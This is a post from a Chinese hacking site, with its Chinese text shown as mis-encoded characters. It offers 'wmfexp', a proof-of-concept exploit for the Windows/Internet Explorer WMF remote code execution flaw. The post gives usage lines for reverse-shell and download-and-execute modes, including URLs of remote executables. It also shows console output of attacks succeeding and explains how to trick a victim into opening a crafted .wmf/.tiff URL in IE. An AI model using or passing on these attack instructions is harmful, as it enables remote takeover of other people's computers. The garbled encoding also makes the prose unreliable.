ms0601wmfÎÄ¼þÔ¶³ÌÖ´ÐÐ´úÂëÀûÓÃ³ÌÐò-º§¿Í»ùµØ-Òç³ö¹¥»÷

C°æµÄÁË£¬³ÌÐòÔËÐÐ°ïÖúÈçÏÂ£º

QUOTE:

Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

P.O.C VERSION

codez by superlone@EST

Usage:
wmfexp

shell type <====> 1:
<====>

e.g: wmfexp 1 192.168.1.111 8080 192.168.1.111 1314

shell type <====> 2:
<====>

e.g: wmfexp 2 192.168.1.111 8080 http://www.eviloctal.com/superlone.exe

^_^ SHOW my love to LiuHui,for EVER and EVER!!!!

Ò»¿´¾ÍÃ÷°×µÄ£¬²»ÓÃÎÒ¶àËµÁË°É£¿·´ÏòÒç³öµÄÊµÀýÈçÏÂ£º

QUOTE:

E:\temp\Release>wmfexp 1 192.168.1.111 8080 192.168.1.111 1314
Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

P.O.C VERSION
written by superlone@EST

^_^MY love goes to my wife for EVER and EVER

^_^binding 192.168.1.111 on port 8080 with socket ...DONE!
^_^waiting for connection of ANY.WMF request ...GOT IT!
^_^connection received from 192.168.1.3 on port 42249
^_^generating payload ...DONE!
^_^sending crafted data to the remote host 192.168.1.3 ...DONE!
^_^do i work well?-)

½á¹û¿´¸½Í¼¡£

ÏÂÔØÖ´ÐÐµÄÊµÀýÈçÏÂ£º

QUOTE:

E:\temp\Release>wmfexp 2 192.168.1.111 8080 http://www.huibian.com/wmf/wmf.exe
Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

P.O.C VERSION
written by superlone@EST

^_^MY love goes to my wife for EVER and EVER

^_^binding 192.168.1.111 on port 8080 with socket ...DONE!
^_^waiting for connection of ANY.WMF request ...GOT IT!
^_^connection received from 192.168.1.3 on port 43529
^_^generating payload ...DONE!
^_^sending crafted data to the remote host 192.168.1.3 ...DONE!
^_^do i work well?-)

½á¹ûÈç¸½Í¼¡£¡£¡£

ÓÉÓÚÊÇPOC°æËùÒÔÎÒÃ»ÓÐÓÅ»¯shellcode£¬µÈ¹ýÐ©Ê±ÈÕ¹«²¼³ö´úÂëºó´ó¼Ò¿ÉÒÔ×ÔÐÐ¸ü¸Ä£¡£¡£¡

PS£º
ÎÒÔÚsp2ÉÏÒ²ÊÇ²âÊÔ³É¹¦µÄ£¬²»ÖªµÀÄãÃÇÖªµÀ²âÊÔ·½·¨²»£¿8080¶Ë¿ÚÊÇ±¾µØ°ó¶¨µÄ¶Ë¿Ú£¬Î±×°³Éhttp serverµÄ£¬Èç¹ûÕâ¸ö¶Ë¿ÚÒÑ¾ÓÐ³ÌÐòÕ¼ÓÃ³ÌÐò¾Í»á³öÏÖ¡°...*_* error:bind operation fail
ed¡±£¬Ã»Ê¹ÓÃ¶Ë¿Ú¸´ÓÃ¡£¡£¡£
ÁíÍâÕâ¸öÂ©¶´³ÌÐòµÄÀûÓÃÊÇ²»ÊÇ»¹ÓÐºÜ¶àÅóÓÑ²»Ã÷°×°¡£¬µ±³ÌÐò³öÏÖ¡°^_^waiting for connection of ANY.WMF request ...¡±Ê±£¬ËµÃ÷exploitÒÑ¾³É¹¦ÔËÐÐ²¢ÒÑ¾¼àÌýÔÚÄãÉèÖÃµÄ¶Ë¿ÚÉÏÁË£¨±ÈÈç8080£©£¬Õâ¸öÊ±ºòÐèÒªÄã·¢»ÓÄãµÄÏëÏñÁ¦Ïë°ì·¨ÈÃ¶Ô·½ÔÚIEÖÐ·ÃÎÊÄãµÄURL£¬²»ÖªµÀÄãµÄurlÂð£¿¹ÖÎÒÍüÁË¸ú´ó¼ÒËµÁË£¬Èç¹û¶Ô·½·ÃÎÊÕâÑùµÄurl£º
http://ÄãµÄIP£ºÄã¼àÌýµÄ¶Ë¿Ú/any.wmf

¾Í»áÖÐÕÐ£¬ÆäÖÐÄãµÄIP²»ÓÃËµÁË°É£¿ÍâÍøÊ¹ÓÃµÄ»°¿Ï¶¨ÒªÓÐ¹«ÍøIPµÄ¡£¡£¡£¡£Äã¼àÌýµÄ¶Ë¿Ú¾ÍÊÇÎ±×°µÄhttp serverµÄ¶Ë¿Ú£¬ÔÚÀý×ÓÖÐÊÇ8080¶Ë¿Ú¡£any.wmfÊÇÈÎÒâµÄÎÄ¼þ£¬Ëæ±ãÄãÐ´°É£¬µ«ºó×º±ØÐëÊÇÒÔÏÂÖÐµÄÒ»¸ö£º
dib emf wmf bmp tiff
±ÈÈçÕâÑùµÄurl£º
http://192.168.1.111:8080/mylove.tiff
Ö»ÒªÓÐÂ©¶´µÄÖ÷»úÓÃIE´ò¿ªÉÏÃæµÄÕâ¸öURL¾Í»áÖÐ±êÁË¡£¡£¡£¡£ÁíÍâ£¬ÎÒÉÏÃæ²âÊÔÓÐ¸öwindows°´Å¥×¨¼ÒµÄ½ØÍ¼£¬ÄÇ¸ö¾ÍÊÇÔÚxp sp1µÄ»úÆ÷ÉÏ·ÃÎÊÎÒµÄurlºó³É¹¦ÏÂÔØÖ´ÐÐµÄ¡£¡£¡£

Ã÷°×ÁËÂð£¿ÎÒµÄ³ÌÐòÌá¹©ÁË·´ÏòÁ¬½ÓºÍÏÂÔØÖ´ÐÐÁ½¸ö¹¦ÄÜ£¬ÍÆ¼öÄãÊ¹ÓÃÏÂÔØÖ´ÐÐ¡£¡£¡£ÎªÊ²Ã´£¿ÄãÑ¾ÕÒ³é¡«¡«¡«
ÔÙÒªËµÃ÷£¬·¢²¼µÄÕâ¸ö³ÌÐòÊÇP.O.C°æ±¾£¬Òò´ËÃ»ÓÐ¶ÔhttpÇëÇó°ü½øÐÐ·ÖÎö£¬±ÈÈçÅÐ¶ÏÄ¿±ê»úÆ÷ÊÇ²»ÊÇxpÒÔÉÏµÄÏµÍ³µÈµÈ¡£¡£¡£ÐèÒªÔ´´úÂëµÄ¿ÉÒÔÕÒÎÒÒª£¬»òÕß¹ý¼¸Ìì¾Í¹«²¼ÁË¡£¡£¡£
»¹²»Ã÷°×µÄÎÒ¾ÍÃ»°ì·¨ÁË£¬»¢×ÓËµÎÒµÄÓïÑÔ±í´ïÄÜÁ¦ºÜÇ¿µÄ¡£¡£¡£¡£

×¢Òâ£º²âÊÔurlºóÊ¹ÓÃµÄºó×ºÃûÖ»¿ÉÒÔÊÇÒÔÏÂ¼¸¸öÖÐµÄÒ»¸ö£º
dib emf wmf bmp tiff


	ºÚ¿ÍÊ×Ò³¡¡\|¡¡·þÎñÖ¸ÄÏ¡¡\|¡¡Èí¼þ·¢²¼ ¡¡\|¡¡¹ØÓÚÎÒÃÇ¡¡\|¡¡±¾Õ¾ÉùÃ÷ ¡¡\|¡¡ÒþË½ÉùÃ÷¡¡\|¡¡³ÏÕ÷Ó¢²Å¡¡\|¡¡ÍøÕ¾µØÍ¼¡¡\|¡¡ÓÑÇéÁ´½Ó¡¡\|
	ÖÐ¹ú¡¤ºÚ¿Í¡¤º§¿Í¡¤»ùµØ¡¡ÇëÊ¹ÓÃIE6.0°æ±¾, ·Ö±çÂÊ1024¡Á768½øÐÐä¯ÀÀ www.hookbase.com Õ¾³¤£ºÀû¿Í¡¡Email:hookbase@163.com Copyright © 2004-2009 All Rights Reserved. ÔÁICP±¸05000985ºÅ